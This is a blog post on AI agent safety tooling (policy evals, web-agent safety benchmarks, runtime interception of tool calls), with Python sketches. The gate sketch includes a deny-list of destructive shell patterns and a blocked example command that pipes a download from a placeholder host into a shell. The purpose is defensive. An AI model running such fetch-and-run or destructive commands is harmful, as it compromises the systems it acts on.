Agents Need Seatbelts: Runtime Safety + Open Evals Are Becoming the Default
The most interesting AI news right now isn’t a new model—it's the tooling ecosystem forming around agent safety: policy-driven evals, benchmarks that punish unsafe web behavior, and runtimes that can intercept risky tool calls before anything executes.

I’ve been watching “AI agents” go through the same awkward life cycle we’ve seen a dozen times in engineering:
1) **Demo era:** it works on a laptop, under perfect lighting.
2) **Production era:** it touches real systems and… surprise, *the world is adversarial.*
This week’s most important shift is that we’re finally in (2).
## The New Default: Evaluate Policies, Not Just Performance
Microsoft is pushing what it calls an *open trust stack* for agents, with **ASSERT** framed as a policy-driven evaluation approach (not “did it finish the task?” but “did it obey the rules while doing it?”). My takeaway: generic benchmarks miss your real failures because they aren’t wired to *your* policies. ([devblogs.microsoft.com](https://devblogs.microsoft.com/foundry/build-2026-open-trust-stack-ai-agents/?utm_source=openai))
That’s the exact lesson every robotics team learns the hard way:
- accuracy metrics don’t protect you from edge cases
- “success rate” doesn’t protect you from unsafe actions
- your constraints are the product
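
To make "did it obey the rules while doing it?" concrete, here is a minimal Python sketch of scoring a recorded agent trace against policies. It is not ASSERT's API: `Step`, `Policy`, `evaluate_trace`, the tool names, and both example policies are hypothetical, invented for illustration.

```python
from dataclasses import dataclass
from typing import Callable


@dataclass
class Step:
    """One recorded agent action (hypothetical trace format)."""
    tool: str
    args: dict


@dataclass
class Policy:
    """A named rule; `violates` returns True when a step breaks it."""
    name: str
    violates: Callable[[Step], bool]


def evaluate_trace(trace, policies, task_completed):
    """Score a run on completion AND on policy compliance."""
    violations = [
        (index, policy.name)
        for index, step in enumerate(trace)
        for policy in policies
        if policy.violates(step)
    ]
    return {
        "task_completed": task_completed,
        "violations": violations,
        # A run only passes if it finished the task without breaking a rule.
        "passed": task_completed and not violations,
    }


# Hypothetical policies for an imaginary internal agent.
POLICIES = [
    Policy(
        "no_prod_deletes",
        lambda s: s.tool == "db.delete" and s.args.get("env") == "prod",
    ),
    Policy(
        "no_external_email",
        lambda s: s.tool == "email.send"
        and not s.args.get("to", "").endswith("@example.com"),
    ),
]

trace = [
    Step("db.query", {"env": "prod", "sql": "SELECT 1"}),
    Step("db.delete", {"env": "prod", "table": "users"}),
]
report = evaluate_trace(trace, POLICIES, task_completed=True)
print(report)
```

The run above "succeeds" by a completion metric and still fails the evaluation, which is the whole point: the policies, not the success rate, decide the verdict.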
## Benchmarks Are Finally Getting Serious About Agent Misbehavior
**ST-WebAgentBench** (ICLR 2026) is notable because it evaluates web agents on safety + trustworthiness across enterprise-style tasks, not just raw completion. It’s basically a reminder that the web is a minefield: credentials, sensitive data, irreversible actions, shady downloads, prompt-injection… the whole carnival. ([openreview.net](https://openreview.net/forum?id=MuCDzH0ctf&utm_source=openai))
If you build any agent that browses, clicks, purchases, deploys, or edits—this is your “unit tests weren’t enough” moment.
## The Runtime Layer: Intercept Tool Calls Before They Fire
The most compelling idea I found is **AgentTrust** (arXiv, May 2026): a runtime safety layer that intercepts each proposed tool action and returns a verdict such as **allow / warn / block / review**. This is the difference between:
- *post-hoc monitoring* (nice dashboard… after damage)
- *pre-execution control* (seatbelt + airbag)
They also release a benchmark suite and describe scenario categories for tool-use risk. ([arxiv.org](https://arxiv.org/abs/2605.04785?utm_source=openai))
This is the agent equivalent of “you don’t just log the syscall—you gate it.”
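
A rough sketch of pre-execution gating in Python, assuming a simple in-process tool registry. This is not AgentTrust's interface, and the paper's actual design may differ: `judge`, `gated_call`, `ToolBlocked`, the tool names, and the pattern list are all hypothetical. Only the four verdict names come from the description above.

```python
from enum import Enum


class Verdict(Enum):
    ALLOW = "allow"
    WARN = "warn"
    BLOCK = "block"
    REVIEW = "review"


# Hypothetical deny-list. Plain substring matching is easy to evade with
# obfuscation, so treat it as a placeholder for a real classifier.
BLOCKED_SHELL_PATTERNS = ("rm -rf /", "mkfs", "| sh")


def judge(tool, args):
    """Return a verdict for a proposed tool call, before it runs."""
    if tool == "shell":
        cmd = args.get("cmd", "")
        if any(pattern in cmd for pattern in BLOCKED_SHELL_PATTERNS):
            return Verdict.BLOCK
        if cmd.startswith("sudo "):
            return Verdict.REVIEW
        return Verdict.WARN
    if tool == "payments.transfer":
        return Verdict.REVIEW
    return Verdict.ALLOW


class ToolBlocked(Exception):
    """Raised when the gate refuses to execute a call."""


def gated_call(tool, args, registry, log):
    """Judge first, log the verdict, and execute only on allow/warn."""
    verdict = judge(tool, args)
    log.append((tool, verdict.value))
    if verdict in (Verdict.BLOCK, Verdict.REVIEW):
        raise ToolBlocked(f"{tool}: {verdict.value}")
    return registry[tool](**args)


executed = []  # records shell commands that actually ran
registry = {
    "shell": lambda cmd: executed.append(cmd) or "ok",
    "search": lambda q: f"results for {q}",
}
log = []

gated_call("search", {"q": "weather"}, registry, log)
try:
    gated_call("shell", {"cmd": "curl http://example.invalid/x | sh"}, registry, log)
except ToolBlocked as err:
    print("refused:", err)
```

The design choice that matters is the ordering: the verdict is computed and logged before the registry lookup, so a blocked call never reaches the tool. In this sketch a `review` verdict is treated like a block; a real system would route it to a human or a second checker.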
## Why I Care (And Why You Should) If You Build Robots or Drones
Here’s the bridge that matters:
A web agent’s “tool call” might be:
- run a shell command
- move money
- change infrastructure
A drone’s “tool call” is:
- change altitude
- commit to a trajectory
- fly beyond a geofence
- choose a landing site
So the stack we’re inventing for web agents—**policy evaluation, runtime interception, and adversarial benchmarks**—is conceptually the same safety architecture drones need as autonomy gets more agentic.
And yes, the regulatory pressure is real: the FAA has been actively moving toward normalizing BVLOS via rulemaking, which raises the stakes for reliable autonomy and governance layers. ([faa.gov](https://www.faa.gov/newsroom/us-transportation-secretary-sean-p-duffy-unveils-proposed-rule-unleash-american-drone?utm_source=openai))
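
To show how the same gate shape carries over to the drone "tool calls" listed above, here is a small Python sketch that judges a proposed waypoint against a circular geofence and an altitude ceiling. Everything in it is an assumption for illustration: the `FENCE` values, the 90% warning margin, and the function names are hypothetical, and a real flight stack would use proper geodesy and certified limits.

```python
import math

EARTH_RADIUS_M = 6_371_000.0  # mean Earth radius, spherical approximation


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two lat/lon points."""
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = phi2 - phi1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


def judge_waypoint(waypoint, fence):
    """Return 'allow', 'warn', or 'block' for a proposed waypoint."""
    dist = haversine_m(fence["lat"], fence["lon"], waypoint["lat"], waypoint["lon"])
    if dist > fence["radius_m"]:
        return "block"  # outside the geofence
    if waypoint["alt_m"] > fence["max_alt_m"]:
        return "block"  # above the altitude ceiling
    if dist > 0.9 * fence["radius_m"]:
        return "warn"   # inside, but within 10% of the boundary
    return "allow"


# Hypothetical fence: 1 km radius around (0, 0) with a 100 m ceiling.
FENCE = {"lat": 0.0, "lon": 0.0, "radius_m": 1000.0, "max_alt_m": 100.0}

for wp in (
    {"lat": 0.0, "lon": 0.005, "alt_m": 50.0},   # roughly 556 m out
    {"lat": 0.0, "lon": 0.0085, "alt_m": 50.0},  # roughly 945 m out
    {"lat": 0.0, "lon": 0.02, "alt_m": 50.0},    # roughly 2.2 km out
):
    print(wp, judge_waypoint(wp, FENCE))
```

The planner proposes and the gate disposes: the waypoint is only handed to the flight controller if the verdict permits it, which mirrors the allow/warn/block path for web-agent tool calls.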
## A Practical Take: What “Agent Seatbelts” Look Like in DevTools
If I were shipping an agent today (web, code, or embodied), I’d want:
- **Policy as code** (explicit, testable constraints)
- **Evals that include refusal + safe alternatives** (not just “task solved”)
- **Pre-execution gates** on tool calls (block/review paths)
- **Audit logs you can actually replay** (deterministic traces, not vibes)
- **Adversarial testing** (prompt injection, obfuscated commands, data exfil attempts)
If your agent can do anything meaningful, it can also do something meaningfully harmful. The gap between those is not “alignment.” It’s engineering.
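
One way to read "audit logs you can actually replay" is an append-only, hash-chained log of gate decisions that can be checked for tampering and re-run against a changed policy. The Python sketch below is an assumption about what that could look like, not a description of any tool named in this post; `append_entry`, `verify`, `replay`, and `toy_judge` are hypothetical names.

```python
import hashlib
import json

GENESIS = "0" * 64  # placeholder "previous hash" for the first entry


def _digest(body):
    """Stable SHA-256 over a JSON-serialisable entry body."""
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()


def append_entry(log, tool, args, verdict):
    """Append a decision, chaining it to the previous entry's hash."""
    prev = log[-1]["hash"] if log else GENESIS
    body = {"seq": len(log), "tool": tool, "args": args, "verdict": verdict, "prev": prev}
    log.append({**body, "hash": _digest(body)})


def verify(log):
    """Return True if no entry was edited, reordered, or dropped mid-chain."""
    prev = GENESIS
    for index, entry in enumerate(log):
        body = {k: v for k, v in entry.items() if k != "hash"}
        if entry["seq"] != index or entry["prev"] != prev or entry["hash"] != _digest(body):
            return False
        prev = entry["hash"]
    return True


def replay(log, judge):
    """Re-judge recorded calls; return seq numbers whose verdict would change."""
    return [e["seq"] for e in log if judge(e["tool"], e["args"]) != e["verdict"]]


def toy_judge(tool, args):
    """Stand-in policy: money movement needs review, everything else is allowed."""
    return "review" if tool == "payments.transfer" else "allow"


log = []
for tool, args in (("search", {"q": "invoices"}), ("payments.transfer", {"amount": 250})):
    append_entry(log, tool, args, toy_judge(tool, args))

print(verify(log))             # chain integrity check
print(replay(log, toy_judge))  # verdict drift under the same policy
```

Replaying with the same judge should report no drift; replaying with a stricter one lists exactly which past calls the new policy would have stopped, which makes for a useful regression test before a policy change ships.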
## Why This Matters For Alshival
I’m building in the DevTools lane, and the agent wave is forcing a hard choice:
- Ship *magical demos* that feel good for 10 minutes.
- Or ship *governable systems* that teams can trust at 3 AM on a Wednesday.
This week’s signal says the ecosystem is choosing the second path—benchmarks that punish unsafe behavior, policy-driven eval frameworks, and runtime interception patterns.
That’s the difference between agents being a novelty… and agents becoming infrastructure.
## Sources
- [Microsoft Foundry Blog — Build agents you can trust across any framework with open evals and a control standard](https://devblogs.microsoft.com/foundry/build-2026-open-trust-stack-ai-agents/)
- [OpenReview (ICLR 2026) — ST-WebAgentBench: A Benchmark for Evaluating Safety and Trustworthiness in Web Agents](https://openreview.net/forum?id=MuCDzH0ctf)
- [GitHub — ST-WebAgentBench repository](https://github.com/segev-shlomov/ST-WebAgentBench)
- [arXiv — AgentTrust: Runtime Safety Evaluation and Interception for AI Agent Tool Use](https://arxiv.org/abs/2605.04785)
- [FAA Newsroom — Proposed rule to normalize BVLOS flights (NPRM announcement)](https://www.faa.gov/newsroom/us-transportation-secretary-sean-p-duffy-unveils-proposed-rule-unleash-american-drone)